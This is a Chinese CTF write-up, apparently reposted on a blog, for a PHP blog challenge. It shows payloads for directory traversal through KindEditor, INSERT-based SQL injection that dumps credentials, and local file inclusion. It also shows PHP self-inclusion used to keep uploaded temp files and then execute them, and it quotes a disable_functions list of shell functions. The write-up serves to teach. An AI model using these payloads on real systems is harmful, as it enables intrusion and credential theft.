引入flag.php文件,php文件自包含的奇淫技巧

最新推荐文章于 2022-10-28 19:38:55 发布
最新推荐文章于 2022-10-28 19:38:55 发布
阅读量1k 收藏
点赞数
文章标签: 引入flag.php文件

原标题:php文件自包含的奇淫技巧

前言

刷题的时候刚好看到一个比较厉害的phpinfo的利用姿势,原理不是很懂,题目来自百度杯12月第四场Blog进阶版

以下是writeup

解题过程

注册以后

发现了一个编辑器,网上搜索一番,编辑器可以列目录:

1http://931088e56a06460eb01b88a21186b77e156bc67ce775433a.changame.ichunqiu.com/kindeditor/php/file_manager_json.php?path=/../../../../../../../tmp/

在提交的地方有注入,就是那种正常的insert注入:

1title=1a&content=1','4'),('a',(selectgroup_concat(username,password) fromusers),'a

2admin

33177d917a0053c6161207e733c84356d(19-10-1997)

4

登录以后

可以文件包含,但是filter协议不能使用:

1http://931088e56a06460eb01b88a21186b77e156bc67ce775433a.changame.ichunqiu.com/blog_manage/manager.php?module=../robots.txt&name=111

一个思路思路就是通过文件包含无限的包含自身,让PHP的调用栈清空,然后以post的方式提交一个文件,文件会保存在/tmp目录,这个时候通过编辑器路径查看的漏洞查看文件名之后 文件包含:

一下是payload:

1

2

3

4

upload

5

6

7

8upload file2:

9

10

11

12

上传如下代码:

1<?phpphpinfo ;?>

通过编辑器的漏洞查看文件名之后,可以看到临时文件的文件名称:

通过phpinfo可以发现:

1exec,passthru,shell_exec,assert,eval,glob,imageftbbox,bindtextdomain,mkdir,dir, system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,symlink,chgrp,chmod,chown,dl,mail,readlink,stream_socket_server,fsocket, imap_mail,apache_child_terminate,posix_kill,proc_terminate,proc_get_status,syslog,openlog,ini_alter,chroot,fread,fgets,fgetss,file,readfile, ini_set,ini_restore,putenv,apache_setenv,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,file_get_contents,fpassthru,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,fputs,unlink, pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority, pcntl_setpriority

那我们通过提交如下代码来获取flag

1<?php

2highlight_file("/var/www/html/flag.php");

3?>

原理解读

以上就是一个全部的解题的过程,这个姿势很奇葩,原来都没有见过,过程不是很懂,去php文档里面查了查php文件上传的原理,了解了一下php的一些特性,感觉对php的的了解又深入了一点:

php的全局数组$_FILES中

1$_FILES['myFile']['tmp_name'] 文件被上传后在服务端储存的临时文件名,一般是系统默认。可以在php.ini的upload_tmp_dir 指定,默认是/tmp目录。

一般文件上传之前,php就保存在/tmp目录之下,然后后端的代码主要通过move_uploaded_file函数来将缓存文件移动到新的目录中去,继续查阅php文档之后,我们会发现,php的临时文件名是php[0-9A-Za-z]{3,4}上传完毕,程序继续执行之后,php的临时文件就会自动删除。

如果程序停止执行,php的临时文件就不会自动删除,那么如何才能防止其自动删除呢?

如wp所示,不停的自我包含,程序崩溃,这个时候php的自我保护机制为了让其从程序错误中恢复出来,就会清空自己的内存栈空间,缓存文件就不会删除了。

总结

了解了一种新的攻击方式,总结一下要完成这种攻击,需要的条件

可以列目录

知道

php文件自我包含

文件上传

查看文件名称

包含上传的文件 getshell

文件包含漏洞——初级篇 :通过实验学习了解文件包含漏洞的原理,掌握文件包含漏洞的利用方法。

0bce0f0f2ce431f6fb5b49d316fa29ce.png

长按开始学习

大家有好的技术原创文章

了解投稿详情点击——重金悬赏 | 合天原创投稿等你来!返回搜狐,查看更多

责任编辑:

和风木雨
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php.ini-文件配置详解.doc
11-30
PHP.ini 文件配置详解 PHP.ini 文件PHP 的核心配置文件,它控制着 PHP 的行为和性能。本文将对 PHP.ini 文件的配置进行详细解释。 语法 PHP.ini 文件的语法非常简单。空白字符和以分号开始的行被简单地忽略。...
PHPINFO
m0_65849838的博客
04-22 555
前言 目录 一.开启题目 二.寻找flag 三.解开题目 实操 一.开启题目 二.寻找flag 开启题目后会得到一个flag表 Ctrl+f输入flag进行搜索,找到flag 三.解开题目
flag就在flag.php
热门推荐
Peithon的博客
05-13 9万+
Web1 题目地址 1.访问题目存在一个登录界面 2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示 3.访问flag.php,试试可不可以得到flag 提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的 4.抓包 发现在Cookie有username,而且每一个用户的username是不一样的,后面的值是base64加密...
flag.php
萍水间人的小天地
01-29 1832
写在前面 好吧我承认我是看了别人的wp,目前还很菜 然而我看了wp也不会做。 初探 页面 进去之后是一个什么都点不动的页面。。 然后有提示 hint 联系到可能是SQL注入 于是在URL后面加一个hint参数 http://123.206.87.240:8002/flagphp/?hint=1 得到一串代码: <?php error_reporting(0)...
引入flag.php文件,flagphp中咋解决
weixin_33982355的博客
03-10 2515
该楼层疑似违规已被系统折叠隐藏此楼查看此楼include("flag.php");highlight_file(__FILE__);class FileHandler {protected $op;protected $filename;protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";...
【CTF整理】WriteUp Bugku flag.php
SunnyCat
10-30 886
WriteUp Bugku flag.php 题目:http://123.206.87.240:8002/flagphp 点击:flag.php 随便输入点击没有反应,右键查看源码,没什么有价值的发现 想到提示hint,将之作为url参数提交试试,出现php代码。 顺序:1、2、3、4、5、 <?php error_reporting(0); include_once("flag.php"); // 1、flag的位置 $cookie = $_COOKIE['ISecer']; //
php定时删除文件夹下文件(清理缓存文件)
12-19
总结来说,PHP定时删除文件夹下文件涉及到的核心知识点包括文件和目录操作函数的使用、进程控制、以及自定义函数实现递归删除。结合服务器的计划任务调度,可以实现安全、有效的文件清理策略,以保持系统高效运行。
php-fpm.conf配置文件中文翻译注释
06-12
- `php_admin_flag[allow_url_fopen] = off`:关闭通过URL打开文件的功能,防止远程文件包含攻击。 - `rlimit_files = 1024`:限制进程可以打开的最大文件描述符数。 - `rlimit_core = 0`:限制核心转储文件的...
php上传文件分类实例代码
08-31
首先,这个实例定义了一个名为`Upload`的类,该类包含了处理文件上传的核心方法。下面是对类中各个方法的详细解释: 1. **允许的文件扩展名(`$allowExt`)**:这个类变量定义了允许上传的文件类型,例如`gif`, `...
引入flag.php文件,WEB_flag在index
weixin_28888459的博客
03-10 811
题解:打开题目 点击进去,除了一个test5后什么也没有,但是发现了URL中的地址后缀变化,是典型的文件包含漏洞,file关键字是提示,其实也是CTF的套路 题目标题就说明了,flag在index中,要用到php的封装协议,在文件后缀添加 ?file=php://filter/read=convert.base64-encode/resource=index.php即http://123.206...
文件包含漏洞
weixin_63231007的博客
03-22 1087
定义: 在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。 危险函数: include() , include_once() , require() , require_once(). 解题思路: 本地文件包含: 直接读取目标机上的Flag文件. 远程文件包含:指定第三方服务器上可运行的PHP木马,拿到webshell,查看Flag文件. 判断本地文件包含与远程文件包含方法: ...
BugkuCTF(flag.php)
痴人说梦梦中人
03-27 1326
点开发现login根本没用,抓包发现是get请求POST请求要比get安全,大部分涉密数据都用POST请求,如下图: 既然是get请求了,常见套路就是传递参数,正好有提示hint,构造URL如图,获取源码 阅读代码发现,如果get参数为hint,给你展示源码,否则反序列化的$cookie=$KEY时给你flag,再否则还是那个登录页面,仔细看你就会发现下边的$KEY的值是迷惑你的,卵用没得,...
每天一道ctf
whisper921的博客
10-28 892
有这样一行代码
flag.php--cookie伪造分号必须url编码、unserialize()函数、serialize()
qq_32642035的博客
03-18 348
拿到题目 发现很干净,点击提交不发生流量,源码和header都没有发现线索 回到题目看到提示,提示:hint 题目为flag.php 线索可能有两个,hint参数和flag.php页面 尝试在各个页面通过get和post方式hint参数 发现主页提交参数得到源码 访问flag.php无显示内容 serialize()序列化函数 serialize() 返回字符串,此字符串包含了表示 valu...
PHP中flag参数,flag(命令行参数解析flag包)
weixin_39864571的博客
03-21 1271
import "flag"概述索引例子概述Flag 包实现了命令行标志解析。用法:使用 flag.String(),Bool(),Int() 等定义标志。这声明了一个整型 flag,-flagname,都存储在指针 ip 中,类型为 *int 。import"flag"varip=flag.Int("flagname",1234,"helpmessageforflagname")...
【ctfhub】SSRF
qq_61109509的博客
02-20 832
目录 SSRF 知识点:回环地址 内网访问 伪协议读取文件 数字IP Bypass DNS 重绑定 URL Bypass 302跳转 Bypass SSRF 在过滤了一堆中找ip本身 我们不能直接访问pc或moblie,必须通过server操作 直接改包很难,除非有说明是从本地来,否则严格的服务器不能通过改包实现 都是让服务器能够访问本地或者内网环境 知识点:回环地址 127.0.0.1 这是一个最常见的回环地址。 回环地址是什么呢? 回环地址并非只有一...
flag就在flag.php,flag就在flag.php
weixin_39610807的博客
03-11 625
Web1题目地址1.访问题目存在一个登录界面 2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示 3.访问flag.php,试试可不可以得到flag 提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的4.抓包 发现在Cookie有username,而且每一个用户的username是不一样的,后面的值是base64加密之后的 在登录成功跳转的那个页面还有一个...
Bugku CTF flag.php WriteUp
Ta_ki
03-18 8977
Bugku CTF flag.php WriteUp 原题链接 flag.php 进去后第一反应是SQL注入得到flag,但是发现输入任何特殊字符点击Login都没有反应,查看源代码未发现异样。回到Bugku CTF界面,发现给了一个hint 提示给了一个hint,用户名密码输入hint没有反应,突然想到Get传参,传入参数 120.24.86.145:8002/flagph...
第二十三天
weixin_46653764的博客
07-03 348
一、来做这个题 1、第一题 flag在这 打开后是这样的,然后点开链接,跳转到404,可查看元素,该链接跳转的地址是↓ 所以应该是被重定向了,那我就burp抓包来repeater一下,然后就得到flag.php页面的回应,flag拿到手!!! 2、第二天 打开宝盒 根据题目,我就先保存图片文件看看吧,用pad++打开,一堆乱码,大概flag就藏在面,但我找不到hhahah 3、 看题目 本地管理员?那就伪造ip,把ip改成127.0.0.1,这就要用到http头面的 X-Forwarde
ctf flag.php
最新发布
09-05
很抱歉,我不能提供你所需的答案。...Flag.php 是可能是一个任务或挑战中的一个文件名,但我无法提供具体答案。如果你在参与CTF比赛,我建议你仔细审查相关的信息和提示,并利用自己的技能去解决问题。祝你好运!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值